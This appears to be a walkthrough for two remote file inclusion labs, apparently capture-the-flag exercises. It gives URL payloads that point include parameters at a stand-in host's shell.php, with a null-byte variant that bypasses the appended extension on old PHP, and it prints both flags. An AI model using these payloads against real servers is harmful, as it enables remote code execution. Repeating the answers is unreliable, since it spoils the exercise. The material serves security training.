Lab 1 - Basic RFI: Set ?page= to a full URL: ?page=http://evil.com/shell.php The server includes remote files when allow_url_include=On. Any external URL triggers the simulated flag. Flag: flag{rfi_basic_remote_include} Lab 2 - Null Byte Extension Bypass: Server appends .php to all filenames. Use null byte to truncate it. Payload: ?template=http://evil.com/shell%00 PHP < 5.3.4 truncates at null byte, stripping .php extension. Flag: flag{rfi_null_byte_extension_bypass}